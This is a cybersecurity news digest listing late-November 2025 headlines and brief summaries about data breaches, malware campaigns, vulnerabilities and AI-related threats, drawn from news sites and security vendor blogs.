2025 January(178) February(102) March(349) April(412) May(435) June(471) July(395) August(189) September(431) October(494) November(510) December(0)
DATE |
NAME |
Info |
CATEG. |
WEB |
| 30.11.25 | Man behind in-flight Evil Twin WiFi attacks gets 7 years in prison | A 44-year-old man was sentenced to seven years and four months in prison for operating an "evil twin" WiFi network to steal the data of unsuspecting travelers at various airports across Australia. | CyberCrime | |
| 30.11.25 | Public GitLab repositories exposed more than 17,000 secrets | After scanning all 5.6 million public repositories on GitLab Cloud, a security engineer discovered more than 17,000 exposed secrets across over 2,800 unique domains. | Incindent | |
| 30.11.25 | French Football Federation discloses data breach after cyberattack | The French Football Federation (FFF) disclosed a data breach on Friday after attackers used a compromised account to gain access to administrative management software used by football clubs. | Incindent | |
| 30.11.25 | Malicious LLMs empower inexperienced hackers with advanced tools | Unrestricted large language models (LLMs) like WormGPT 4 and KawaiiGPT are improving their capabilities to generate malicious code, delivering functional scripts for ransomware encryptors and lateral movement. | AI | |
| 30.11.25 | GreyNoise launches free scanner to check if you're part of a botnet | GreyNoise Labs has launched a free tool called GreyNoise IP Check that lets users check if their IP address has been observed in malicious scanning operations, like botnet and residential proxy networks. | Security | |
| 30.11.25 | OpenAI discloses API customer data breach via Mixpanel vendor hack | OpenAI is notifying some ChatGPT API customers that limited identifying information was exposed following a breach at its third-party analytics provider Mixpanel. | AI | |
| 30.11.25 | New ShadowV2 botnet malware used AWS outage as a test opportunity | A new Mirai-based botnet malware named 'ShadowV2' has been observed targeting IoT devices from D-Link, TP-Link, and other vendors with exploits for known vulnerabilities. | BotNet | |
| 30.11.25 | Popular Forge library gets fix for signature verification bypass flaw | A vulnerability in the 'node-forge' package, a popular JavaScript cryptography library, could be exploited to bypass signature verifications by crafting data that appears valid. | Vulnerebility | |
| 30.11.25 | Comcast to pay $1.5M fine for vendor breach affecting 270K customers | Comcast will pay a $1.5 million fine to settle a Federal Communications Commission investigation into a February 2024 vendor data breach that exposed the personal information of nearly 275,000 customers. | Incindent | |
| 30.11.25 | Multiple London councils' IT systems disrupted by cyberattack | The Royal Borough of Kensington and Chelsea (RBKC) and the Westminster City Council (WCC) announced that they are experiencing service disruptions following a cybersecurity issue. | Hack | |
| 30.11.25 | Microsoft: Security keys may prompt for PIN after recent updates | Microsoft warned users on Tuesday that FIDO2 security keys may prompt them to enter a PIN when signing in after installing Windows updates released since the September 2025 preview update. | OS | |
| 30.11.25 | Microsoft to secure Entra ID sign-ins from script injection attacks | Starting in mid-to-late October 2026, Microsoft will enhance the security of the Entra ID authentication system against external script injection attacks. | Hack | |
| 30.11.25 | ASUS warns of new critical auth bypass flaw in AiCloud routers | ASUS has released new firmware to patch nine security vulnerabilities, including a critical authentication bypass flaw in routers with AiCloud enabled. | Vulnerebility | |
| 30.11.25 | OnSolve CodeRED cyberattack disrupts emergency alert systems nationwide | Risk management company Crisis24 has confirmed its OnSolve CodeRED platform suffered a cyberattack that disrupted emergency notification systems used by state and local governments, police departments, and fire agencies across the United States. | Cyber | |
| 30.11.25 | FBI: Cybercriminals stole $262M by impersonating bank support teams | The FBI warns of a surge in account takeover (ATO) fraud schemes and says that cybercriminals impersonating various financial institutions have stolen over $262 million in ATO attacks since the start of the year. | CyberCrime | |
| 30.11.25 | Tor switches to new Counter Galois Onion relay encryption algorithm | Tor has announced improved encryption and security for the circuit traffic by replacing the old tor1 relay encryption algorithm with a new design called Counter Galois Onion (CGO). | Security | |
| 30.11.25 | Code beautifiers expose credentials from banks, govt, tech orgs | Thousands of credentials, authentication keys, and configuration data impacting organizations in sensitive sectors have been sitting in publicly accessible JSON snippets submitted to the JSONFormatter and CodeBeautify online tools that format and structure code. | Security | |
| 30.11.25 | Dartmouth College confirms data breach after Clop extortion attack | Dartmouth College has disclosed a data breach after the Clop extortion gang leaked data allegedly stolen from the school's Oracle E-Business Suite servers on its dark web leak site. | Incindent | |
| 29.11.25 | Malicious Blender model files deliver StealC infostealing malware | A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader. | Virus | |
| 29.11.25 | ClickFix attack uses fake Windows Update screen to push malware | New ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images. | Hack | |
| 29.11.25 | Real-estate finance services giant SitusAMC breach exposes client data | SitusAMC, a company that provides back-end services for top banks and lenders, disclosed on Saturday a data breach it had discovered earlier this month that impacted customer data. | Incindent | |
| 29.11.25 | Shai-Hulud malware infects 500 npm packages, leaks secrets on GitHub | Hundreds of trojanized versions of well-known packages such as Zapier, ENS Domains, PostHog, and Postman have been planted in the npm registry in a new Shai-Hulud supply-chain campaign. | Virus | |
| 29.11.25 | Harvard University discloses data breach affecting alumni, donors | Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members. | Incindent | |
| 29.11.25 | Microsoft to remove WINS support after Windows Server 2025 | Microsoft has warned IT administrators to prepare for the removal of Windows Internet Name Service (WINS) from Windows Server releases starting in November 2034. | OS | |
| 29.11.25 | Microsoft: Windows 11 24H2 bug crashes Explorer and Start Menu | Microsoft has confirmed a critical Windows 11 24H2 bug that causes the File Explorer, the Start Menu, and other key system components to crash when provisioning systems with cumulative updates released since July 2025. | OS | |
| 29.11.25 | Google enables Pixel-to-iPhone file sharing via Quick Share, AirDrop | Google has added interoperability support between Android Quick Share and Apple AirDrop, to let users share files between Pixel devices and iPhones. | OS | |
| 29.11.25 | Iberia discloses customer data leak after vendor security breach | Spanish flag carrier Iberia has begun notifying customers of a data security incident stemming from a compromise at one of its suppliers. The disclosure comes days after a threat actor claimed on hacker forums to have access to 77 GB of data allegedly stolen from the airline. | Incindent | |
| 29.11.25 | WhatsApp API flaw let researchers scrape 3.5 billion accounts | Researchers compiled a list of 3.5 billion WhatsApp mobile phone numbers and associated personal information by abusing a contact-discovery API that lacked rate limiting. | Incindent | |
| 29.11.25 | Cox Enterprises discloses Oracle E-Business Suite data breach | Cox Enterprises is notifying impacted individuals of a data breach that exposed their personal data to hackers who breached the company network after exploiting a zero-day flaw in Oracle E-Business Suite. | Incindent | |
| 29.11.25 | Piecing Together the Puzzle: A Qilin Ransomware Investigation | Huntress analysts reconstructed a Qilin ransomware attack from a single endpoint, using limited logs to reveal rogue ScreenConnect access, failed infostealer attempts, and the ransomware execution path. The investigation shows how validating multiple data sources can uncover activity even when visibility is reduced to a "pinhole." | Ransom | |
| 29.11.25 | CISA warns Oracle Identity Manager RCE flaw is being actively exploited | The U.S. Cybersecurity & Infrastructure Security Agency (CISA) is warning government agencies to patch an Oracle Identity Manager tracked as CVE-2025-61757 that has been exploited in attacks, potentially as a zero-day. | Vulnerebility | |
| 29.11.25 | Nvidia confirms October Windows updates cause gaming issues | Nvidia has confirmed that last month's security updates are causing gaming performance issues on Windows 11 24H2 and Windows 11 25H2 systems. | OS | |
| 29.11.25 | Microsoft: Out-of-band update fixes Windows 11 hotpatch install loop | Microsoft has released an out-of-band cumulative update to fix a known issue causing the November 2025 KB5068966 hotpatch update to reinstall on Windows 11 systems repeatedly. | OS | |
| 29.11.25 | Grafana warns of max severity admin spoofing vulnerability | Grafana Labs is warning of a maximum severity vulnerability (CVE-2025-41115) in its Enterprise product that can be exploited to treat new users as administrators or for privilege escalation. | Vulnerebility | |
| 29.11.25 | CrowdStrike catches insider feeding information to hackers | American cybersecurity firm CrowdStrike has confirmed that an insider shared screenshots taken on internal systems with hackers after they were leaked on Telegram by the Scattered Lapsus$ Hunters threat actors. | Hack | |
| 29.11.25 | FCC rolls back cybersecurity rules for telcos, despite state-hacking risks | The Federal Communications Commission (FCC) has rolled back a previous ruling that required U.S. telecom carriers to implement stricter cybersecurity measures following the massive hack from the Chinese threat group known as Salt Typhoon. | BigBrothers | |
| 29.11.25 | ShadowV2 Casts a Shadow Over IoT Devices | FortiGuard Lab | ShadowV2, a new Mirai-based botnet targeting IoT devices, surfaced during the recent AWS outage. FortiGuard Labs examines its propagation, DDoS capabilities, and global footprint. | BotNet blog | FORTINET |
| 29.11.25 | Cyberthreats Targeting the 2025 Holiday Season: What CISOs Need to Know | Cybercriminal activity is surging ahead of the 2025 holiday season. Deceptive domains, stolen accounts, and e-commerce attacks are accelerating. Here’s what leaders need to know. | Cyber blog | FORTINET |
| 29.11.25 | Beyond the Watering Hole: APT24's Pivot to Multi-Vector Attacks | Google Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by APT24, a People's Republic of China (PRC)-nexus threat actor. Spanning three years, APT24 has been deploying BADAUDIO, a highly obfuscated first-stage downloader used to establish persistent access to victim networks. | APT blog | Google Threat Intelligence |
| 29.11.25 | How attackers infiltrated the npm ecosystem, what Check Point researchers uncovered, and how organizations can | Hacking blog | CHECKPOINT | |
| 29.11.25 | Check Point researchers uncover a large-scale Android adware campaign that silently drains resources and disrupts ... | Malware blog | CHECKPOINT | |
| 29.11.25 | The Week in Vulnerabilities: Cyble Urges Fortinet, Microsoft Fixes | We look at 15 high-priority IT and ICS vulnerabilities – 7 of which are under discussion by threat actors on the dark web. | Vulnerebility blog | Cyble |
| 29.11.25 | RelayNFC: The New NFC Relay Malware Targeting Brazil | CRIL uncovers RelayNFC, a malware leveraging Near-Field Communication (NFC) to intercept and relay contactless payment data. | Malware blog | Cyble |
| 29.11.25 | How Cyble is Empowering European Enterprises with AI-Powered Threat Intelligence | Europe’s cyber threat landscape is escalating fast, driven by ransomware, data leaks, and state-backed actors, marking 2025 as a decisive turning point. | AI blog | Cyble |
| 29.11.25 | Australia Releases 2025 Implementation Plan to Advance National Data and Digital Transformation | Australia’s 2025 Implementation Plan drives progress in AI, data, service delivery and cybersecurity to strengthen the nation’s digital future. | BigBrother blog | Cyble |
| 29.11.25 | The Week in Vulnerabilities: 3 Microsoft Flaws Among High-Priority Fixes | Cyble researchers tracked 971 vulnerabilities this week, with 60 rated critical . Key threats include a 9.8-severity Microsoft GDI+ heap buffer overflow, Firefox sandbox escape, QNAP SQL injection, and five CISA KEV additions. | Vulnerebility blog | Cyble |
| 29.11.25 | Operation Hanoi Thief: Threat Actor targets Vietnamese IT professionals and recruitment teams. | Operation Hanoi Thief: Threat Actor targets Vietnamese IT professionals and recruitment teams. Introduction Key Targets. Industries Affected. Geographical Focus. Infection Chain. Initial Findings Looking into the decoy-document Technical Analysis Stage 1 – Malicious LNK Script Stage 2 – Pseudo-Polyglot... | APT blog | Seqrite |
| 29.11.25 | NORTH KOREAN CYBER CRIME AS A STATECRAFT TOOL | INTRODUCTION Russia’s March 2024 veto of the renewal of the UN Panel of Experts on North Korea ended 15 years of unanimous Security Council support for the sole independent | APT blog | Cyfirma |
| 29.11.25 | The Large-Scale AI-Powered Cyberattack : Strategic Assessment & Implications | Executive Summary In September 2025, the cybersecurity landscape crossed a pivotal threshold with the first widely verified case of an AI-powered, largely autonomous cyber- | AI blog | Cyfirma |
| 29.11.25 | CYFIRMA INDUSTRY REPORT : TELECOMMUNICATIONS & MEDIA | INTRODUCTION CYFIRMA’s ongoing threat monitoring has identified Tycoon 2FA as one of the most advanced and actively deployed Phishing-as-a-Service (PhaaS) platforms | Phishing blog | Cyfirma |
| 29.11.25 | Triofox Unauthenticated Access Control Vulnerability (CVE-2025-12480) | The SonicWall Capture Labs threat research team became aware of an Improper Access Control Vulnerability in Gladinet Triofox, assessed its impact, and developed mitigation measures. | Vulnerebility blog | SonicWall |
| 29.11.25 | Underground Sharp Infostealer Dev Sells Modded Gremlin Source Code | The SonicWall Capture Labs Threat Research Team has recently been tracking infostealer malware stemming from the Sharp malware family. While analyzing a variant of Sharp infostealer, we came across a reference to a Telegram channel that leads to a person claiming to be the developer of this malware. | Malware blog | SonicWall |
| 29.11.25 | The Dual-Use Dilemma of AI: Malicious LLMs | A fundamental challenge with large language models (LLMs) in a security context is that their greatest strengths as defensive tools are precisely what enable their offensive power. | AI blog | Palo Alto |
| 29.11.25 | "Shai-Hulud" Worm Compromises npm Ecosystem in Supply Chain Attack (Updated November 26) | Unit 42 researchers investigated a renewed npm-focused compromise, in a campaign dubbed Shai-Hulud 2.0. This was first reported in early November 2025. | Malware blog | Palo Alto |
| 29.11.25 | The Golden Scale: 'Tis the Season for Unwanted Gifts | In October 2025, we published two Insights blogs on threat activity affiliated with the cybercriminal alliance known as Scattered LAPSUS$ Hunters (SLSH). After a few weeks of apparent inactivity, the threat actors have returned with a vengeance based on open-source reporting and conversations obtained from a new Telegram channel (scattered LAPSUS$ hunters part 7). | Hacking blog | Palo Alto |
| 29.11.25 | Care that you share | This holiday season, as teams run lean and cyber threats rise, being open with what — and how — you share can protect both information and relationships. | Cyber blog | CISCO TALOS |
| 29.11.25 | Bill Largent: On epic reads, lifelong learning, and empathy | Join Bill Largent as he shares his passion for learning, the connection between reading and empathy, and offers fresh insights for the next generation of security professionals. | Cyber blog | CISCO TALOS |
| 29.11.25 | Do robots dream of secure networking? Teaching cybersecurity to AI systems | This blog demonstrates a proof of concept using LangChain and OpenAI, integrated with Cisco Umbrella API, to provide AI agents with real-time threat intelligence for evaluating domain dispositions. | AI blog | CISCO TALOS |
| 29.11.25 | Dell ControlVault, Lasso, GL.iNet vulnerabilities | Cisco Talos’ Vulnerability Discovery & Research team recently disclosed five vulnerabilities in Dell ControlVault 3 firmware and its associated Windows software, four vulnerabilities in Entr'ouvert Lasso, and one vulnerability in GL.iNet Slate AX. The vulnerabilities men | Vulnerebility blog | CISCO TALOS |
| 29.11.25 | This month in security with Tony Anscombe – November 2025 edition | Data exposure by top AI companies, the Akira ransomware haul, Operation Endgame against major malware families, and more of this month's cybersecurity news | Cyber blog | Eset |
| 29.11.25 | What parents should know to protect their children from doxxing | Cyber blog | Eset | |
| 29.11.25 | Influencers in the crosshairs: How cybercriminals are targeting content creators | Cyber blog | Eset | |
| 29.11.25 | MDR is the answer – now, what’s the question? | Why your business needs the best-of-breed combination of technology and human expertise | Cyber blog | Eset |
| 29.11.25 | Analysis of a Large-Scale DDoS Attack Against a Payment Processing Platform | On Saturday, September 13, 2025, a major Distributed Denial-of-Service (DDoS) attack targeted a European payment processing platform, prompting response and mitigation efforts by the F5 Security Operations Center (SOC). | Attack blog | F5 LABS |
| 29.11.25 | The State of Post-Quantum Cryptography (PQC) on the Web | We analyze the world’s most popular websites and most widely used web browsers to determine the current state of PQC adoption on the web. | Cyber blog | F5 LABS |
| 29.11.25 | Fallacy Failure Attack | Welcome to our AI Security Insights for November 2025. These insights are drawn from F5 Labs’ Comprehensive AI Security Index (CASI) and Agentic Resistance Scoring (ARS), which together provide rigorous, empirical measurement of model security and agentic attack resilience. | Attack blog | F5 LABS |
| 29.11.25 | Legacy Python Bootstrap Scripts Create Domain-Takeover Risk in Multiple PyPI Packages | Cybersecurity researchers have discovered vulnerable code in legacy Python packages that could potentially pave the way for a supply chain compromise on the Python Package Index | Hack | The Hacker News |
| 29.11.25 | North Korean Hackers Deploy 197 npm Packages to Spread Updated OtterCookie Malware | The North Korean threat actors behind the Contagious Interview campaign have continued to flood the npm registry with 197 more malicious packages since last month . According to | Virus | The Hacker News |
| 28.11.25 | MS Teams Guest Access Can Remove Defender Protection When Users Join External Tenants | Cybersecurity researchers have shed light on a cross-tenant blind spot that allows attackers to bypass Microsoft Defender for Office 365 protections via the guest access feature in | Security | The Hacker News |
| 28.11.25 | Bloody Wolf Expands Java-based NetSupport RAT Attacks in Kyrgyzstan and Uzbekistan | The threat actor known as Bloody Wolf has been attributed to a cyber attack campaign that has targeted Kyrgyzstan since at least June 2025 with the goal of delivering NetSupport RAT. | Virus | The Hacker News |
| 27.11.25 | Gainsight Expands Impacted Customer List Following Salesforce Security Alert | Gainsight has disclosed that the recent suspicious activity targeting its applications has affected more customers than previously thought. The company said Salesforce initially | CyberCrime | The Hacker News |
| 27.11.25 | Shai-Hulud v2 Spreads From npm to Maven, as Campaign Exposes Thousands of Secrets | The second wave of the Shai-Hulud supply chain attack has spilled over to the Maven ecosystem after compromising more than 830 packages in the npm registry. The Socket | CyberCrime | The Hacker News |
| 26.11.25 | Qilin Ransomware Turns South Korean MSP Breach Into 28-Victim 'Korean Leaks' Data Heist | South Korea's financial sector has been targeted by what has been described as a sophisticated supply chain attack that led to the deployment of Qilin ransomware. "This | Ransom | The Hacker News |
| 26.11.25 | Chrome Extension Caught Injecting Hidden Solana Transfer Fees Into Raydium Swaps | Cybersecurity researchers have discovered a new malicious extension on the Chrome Web Store that's capable of injecting a stealthy Solana transfer into a swap transaction and | Hack | The Hacker News |
| 26.11.25 | RomCom Uses SocGholish Fake Update Attacks to Deliver Mythic Agent Malware | The threat actors behind a malware family known as RomCom targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent. | Virus | The Hacker News |
| 26.11.25 | FBI Reports $262M in ATO Fraud as Researchers Cite Growing AI Phishing and Holiday Scams | The U.S. Federal Bureau of Investigation (FBI) has warned that cybercriminals are impersonating financial institutions with an aim to steal money or sensitive information to | AI | The Hacker News |
| 25.11.25 | JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers | Cybersecurity researchers are calling attention to a new campaign that's leveraging a combination of ClickFix lures and fake adult websites to deceive users into running malicious | Virus | The Hacker News |
| 25.11.25 | ToddyCat's New Hacking Tools Steal Outlook Emails and Microsoft 365 Access Tokens | The threat actor known as ToddyCat has been observed adopting new methods to obtain access to corporate email data belonging to target companies, including using a custom tool | Hack | The Hacker News |
| 25.11.25 | Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware | Cybersecurity researchers have disclosed details of a new campaign that has leveraged Blender Foundation files to deliver an information stealer known as StealC V2 . "This ongoing operation, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader," Morphisec researcher Shmuel Uzan said in a report shared with The Hacker News. | Virus | The Hacker News |
| 25.11.25 | CISA Warns of Active Spyware Campaigns Hijacking High-Value Signal and WhatsApp Users | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday issued an alert warning of bad actors actively leveraging commercial spyware and remote access trojans | CyberCrime | The Hacker News |
| 24.11.25 | New Fluent Bit Flaws Expose Cloud to RCE and Stealthy Infrastructure Intrusions | Cybersecurity researchers have discovered five vulnerabilities in Fluent Bit , an open-source and lightweight telemetry agent, that could be chained to compromise and take over cloud | Vulnerebility | The Hacker News |
| 24.11.25 | Second Sha1-Hulud Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft | Multiple security vendors are sounding the alarm about a second wave of attacks targeting the npm registry in a manner that's reminiscent of the Shai-Hulud attack . The new supply | CyberCrime | The Hacker News |
| 24.11.25 | ⚡ Weekly Recap: Fortinet Exploit, Chrome 0-Day, BadIIS Malware, Record DDoS, SaaS Breach & More | This week saw a lot of new cyber trouble. Hackers hit Fortinet and Chrome with new 0-day bugs. They also broke into supply chains and SaaS tools. Many hid inside trusted apps, browser alerts, and software updates. Big firms like Microsoft, Salesforce, and Google had to react fast — stopping DDoS attacks, blocking bad links, and fixing live flaws. | Cyber | The Hacker News |
| 24.11.25 | Chinese DeepSeek-R1 AI Generates Insecure Code When Prompts Mention Tibet or Uyghurs | New research from CrowdStrike has revealed that DeepSeek's artificial intelligence (AI) reasoning model DeepSeek-R1 produces more security vulnerabilities in response to prompts | AI | The Hacker News |
| 24.11.25 | ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access | A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute malware known as ShadowPad. "The attacker | Virus | The Hacker News |
| 23.11.25 | China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services | The China-linked advanced persistent threat (APT) group known as APT31 has been attributed to cyber attacks targeting the Russian information technology (IT) sector between | APT | The Hacker News |
| 23.11.25 | 'Scattered Spider' teens plead not guilty to UK transport hack | Two British teenagers have denied charges related to an investigation into the breach of Transport for London (TfL) in August 2024, which caused millions of pounds in damage and exposed customer data. | Hack | |
| 23.11.25 | Avast Makes AI-Driven Scam Defense Available for Free Worldwide | Avast is rolling out Scam Guardian, a free AI-powered protection layer that analyzes websites, messages, and links to detect rising scam threats. Powered by Gen Threat Labs data, it reveals hidden dangers in code and adds 24/7 scam guidance through the Avast Assistant. | Safety | |
| 23.11.25 | Google exposes BadAudio malware used in APT24 espionage campaigns | China-linked APT24 hackers have been using a previously undocumented malware called BadAudio in a three-year espionage campaign that recently switched to more sophisticated attack methods. | APT | |
| 23.11.25 | Hacker claims to steal 2.3TB data from Italian rail group, Almaviva | Data from Italy's national railway operator, the FS Italiane Group, has been exposed after a threat actor breached the organization's IT services provider, Almaviva. | Incindent | |
| 23.11.25 | GlobalProtect VPN portals probed with 2.3 million scan sessions | A major spike in malicious scanning against Palo Alto Networks GlobalProtect portals has been detected, starting on November 14, 2025. | Safety | |
| 23.11.25 | Salesforce investigates customer data theft via Gainsight breach | Salesforce says it revoked refresh tokens linked to Gainsight-published applications while investigating a new wave of data theft attacks targeting customers. | Incindent | |
| 23.11.25 | New SonicWall SonicOS flaw allows hackers to crash firewalls | American cybersecurity company SonicWall urged customers today to patch a high-severity SonicOS SSLVPN security flaw that can allow attackers to crash vulnerable firewalls. | Vulnerebility | |
| 23.11.25 | D-Link warns of new RCE flaws in end-of-life DIR-878 routers | D-Link is warning of three remotely exploitable command execution vulnerabilities that affect all models and hardware revisions of its DIR-878 router, which has reached end-of-service but is still available in several markets. | Vulnerebility | |
| 23.11.25 | Turn your Windows 11 migration into a security opportunity | Windows 11 migration is inevitable as Windows 10 support ends, and unsupported systems create major security and ransomware risks. Acronis explains how to use this migration to review backups, strengthen cybersecurity, and ensure data stays recoverable. | OS | |
| 23.11.25 | TV streaming piracy service with 26M yearly visits shut down | Photocall, a TV piracy streaming platform with over 26 million users annually, has ceased operations following a joint investigation by the Alliance for Creativity and Entertainment (ACE) and DAZN. | Cyber | |
| 23.11.25 | Crypto mixer founders sent to prison for laundering over $237 million | The founders of the Samourai Wallet (Samourai) cryptocurrency mixing service have been sent to prison for helping criminals launder over $237 million. | Cryptocurrency | |
| 23.11.25 | Multi-threat Android malware Sturnus steals Signal, WhatsApp messages | A new Android banking trojan named Sturnus can capture communication from end-to-end encrypted messaging platforms like Signal, WhatsApp, and Telegram, as well as take complete control of the device. | Virus | |
| 23.11.25 | Sneaky2FA PhaaS kit now uses redteamers' Browser-in-the-Browser attack | Sneaky2FA, a popular among cybercriminals phishing-as-a-service (PhaaS) kit, has added Browser-in-the-Browser (BitB) capabilities, giving "customers" the option to launch highly deceptive attacks. | Phishing | BleepingComputer |
| 23.11.25 | W3 Total Cache WordPress plugin vulnerable to PHP command injection | A critical flaw in the W3 Total Cache (W3TC) WordPress plugin can be exploited to run PHP commands on the server by posting a comment that contains a malicious payload. | Hack | |
| 23.11.25 | Russian bulletproof hosting provider sanctioned over ransomware ties | Today, the United States, the United Kingdom, and Australia announced sanctions targeting Russian bulletproof hosting (BPH) providers that have supported ransomware gangs and other cybercrime operations. | Ransom | |
| 23.11.25 | New WrtHug campaign hijacks thousands of end-of-life ASUS routers | Thousands of ASUS WRT routers, mostly end-of-life or outdated devices, have been hijacked in a global campaign called Operation WrtHug that exploits six vulnerabilities. | Hack | |
| 23.11.25 | The hidden risks in your DevOps stack data—and how to address them | DevOps repos on GitHub, GitLab, Bitbucket, and Azure DevOps face risks from weak access controls, misconfigurations, outages, and accidental deletions. GitProtect provides automated, immutable backups and fast recovery to secure your DevOps data. | Cyber | |
| 22.11.25 | CISA gives govt agencies 7 days to patch new Fortinet flaw | CISA has ordered U.S. government agencies to secure their systems within a week against another vulnerability in Fortinet's FortiWeb web application firewall, which was exploited in zero-day attacks. | Vulnerebility | |
| 22.11.25 | Meet ShinySp1d3r: New Ransomware-as-a-Service created by ShinyHunters | An in-development build of the upcoming ShinySp1d3r ransomware-as-a-service platform has surfaced, offering a preview of the upcoming extortion operation. | Ransom | |
| 22.11.25 | California man admits to laundering crypto stolen in $230M heist | A 45-year-old from Irvine, California, has pleaded guilty to laundering at least $25 million stolen in a massive $230 million cryptocurrency heist. | Cryptocurrency | |
| 22.11.25 | Cloudflare blames this week's massive outage on database issues | On Tuesday, Cloudflare experienced its worst outage in 6 years, blocking access to many websites and online platforms for almost 6 hours after a change to database access controls triggered a cascading failure across its Global Network. | Cyber | |
| 22.11.25 | ‘PlushDaemon’ hackers hijack software updates in supply-chain attacks | The China-aligned advanced persistent threat (APT) tracked as 'PlushDaemon' is hijacking software update traffic to deliver malicious payloads to its targets. | APT | |
| 22.11.25 | New ShadowRay attacks convert Ray clusters into crypto miners | A global campaign dubbed ShadowRay 2.0 hijacks exposed Ray Clusters by exploiting an old code execution flaw to turn them into a self-propagating cryptomining botnet. | Cryptocurrency | |
| 22.11.25 | Windows 11 gets new Cloud Rebuild, Point-in-Time Restore tools | Microsoft announced two new Windows 11 recovery features today at the Ignite developer conference, called Cloud Rebuild and Point-in-Time Restore (PITR), that aim to reduce downtime and make it easier to recover from system failures or faulty updates. | OS | |
| 22.11.25 | Fortinet warns of new FortiWeb zero-day exploited in attacks | Today, Fortinet released security updates to patch a new FortiWeb zero-day vulnerability that threat actors are actively exploiting in attacks. | Exploit | |
| 22.11.25 | Microsoft to integrate Sysmon directly into Windows 11, Server 2025 | Microsoft announced today that it will integrate Sysmon natively into Windows 11 and Windows Server 2025 next year, making it unnecessary to deploy the standalone Sysinternals tools. | OS | BleepingComputer |
| 22.11.25 | Microsoft Teams to let users report messages wrongly flagged as threats | Microsoft says that Teams users will be able to report false-positive threat alerts triggered by messages incorrectly flagged as malicious. | OS | |
| 22.11.25 | French agency Pajemploi reports data breach affecting 1.2M people | Pajemploi, the French social security service for parents and home-based childcare providers, has suffered a data breach that may have exposed personal information of 1.2 million individuals. | Incindent | |
| 22.11.25 | Attackers Now Bypass App-Based MFA, Hardware Biometrics Stop Them | Tycoon 2FA enables turnkey real-time MFA relays behind 64,000+ attacks this year, proving legacy MFA collapses the moment a phishing kit targets it. Learn from Token Ring how biometric, phishing-proof FIDO2 hardware blocks these relay attacks before they succeed. | Phishing | |
| 22.11.25 | Cloudflare hit by outage affecting Global Network services | Cloudflare is investigating an outage affecting its global network services, with users encountering "internal server error" messages when attempting to access affected websites and online platforms. | Cyber | BleepingComputer |
| 22.11.25 | Matrix Push C2 Uses Browser Notifications for Fileless, Cross-Platform Phishing Attacks | Bad actors are leveraging browser notifications as a vector for phishing attacks to distribute malicious links by means of a new command-and-control (C2) platform called Matrix Push | Phishing | The Hacker News |
| 22.11.25 | CISA Warns of Actively Exploited Critical Oracle Identity Manager Zero-Day Vulnerability | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw impacting Oracle Identity Manager to its Known Exploited Vulnerabilities ( KEV ) | Vulnerebility | The Hacker News |
| 22.11.25 | Arms Race: AI's Impact on Cybersecurity | New whitepaper explores how both attackers and defenders are using the latest AI technologies to achieve their goals. | AI blog | SECURITY.COM |
| 22.11.25 | Unwanted Gifts: Major Campaign Lures Targets with Fake Party Invites | Prolific threat actor delivering RMM packages using variety of lures, including seasonal party invites | Cyber blog | SECURITY.COM |
| 22.11.25 | Another campaign targeting WhatsApp users in Brazil spreads like a worm and employs multiple payloads for credential theft, session hijacking, and persistence | Social blog | SOPHOS | |
| 22.11.25 | CISA’s New Guidance on Bulletproof Hosting: Why It Matters and What Comes Next | The Cybersecurity and Infrastructure Security Agency (CISA) is the U.S. government agency responsible for protecting the nation’s critical infrastructure from cyber and physical threats. CISA works with public and private sector partners to improve resilience, share threat intelligence, and coordinate national-level cyber defense efforts. | Cyber blog | Silent Push |
| 22.11.25 | How Preemptive Cyber Defence Supports the UK's ACD Strategy | UK organisations are expanding their digital footprint, but reliance on reactive security is leaving them exposed. To align with the NCSC’s Active Cyber Defence (ACD) strategy, teams must shift to preemptive defence. | Cyber blog | Silent Push |
| 22.11.25 | Based on recent analysis of the broader threat landscape, Google Threat Intelligence Group (GTIG) has identified a shift that occurred within the last year: adversaries are no longer leveraging artificial intelligence (AI) just for productivity gains, they are deploying novel AI-enabled malware in active operations. This marks a new operational phase of AI abuse, involving tools that dynamically alter behavior mid-execution. | AI blog | Google Threat Intelligence | |
| 22.11.25 | Google Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by APT24, a People's Republic of China (PRC)-nexus threat actor. Spanning three years, APT24 has been deploying BADAUDIO, a highly obfuscated first-stage downloader used to establish persistent access to victim networks. | APT blog | Google Threat Intelligence | |
| 22.11.25 | The global appetite for GLP-1 medications like Ozempic, Wegovy and Mounjaro have created something far ... | AI blog | CHECKPOINT | |
| 22.11.25 | Key findings Malicious activity is rising, with 1 in 11 newly registered Black Friday themed ... | Cyber blog | CHECKPOINT | |
| 22.11.25 | Australia Releases 2025 Implementation Plan to Advance National Data and Digital Transformation | Australia’s 2025 Implementation Plan drives progress in AI, data, service delivery and cybersecurity to strengthen the nation’s digital future. | Cyber blog | Cyble |
| 22.11.25 | The Week in Vulnerabilities: 3 Microsoft Flaws Among High-Priority Fixes | Cyble researchers tracked 971 vulnerabilities this week, with 60 rated critical . Key threats include a 9.8-severity Microsoft GDI+ heap buffer overflow, Firefox sandbox escape, QNAP SQL injection, and five CISA KEV additions. | Vulnerebility blog | Cyble |
| 22.11.25 | Tycoon 2FA: A Technical Analysis of its Adversary-in-the-Middle Phishing Operation | INTRODUCTION CYFIRMA’s ongoing threat monitoring has identified Tycoon 2FA as one of the most advanced and actively deployed Phishing-as-a-Service (PhaaS) platforms | Phishing blog | Cyfirma |
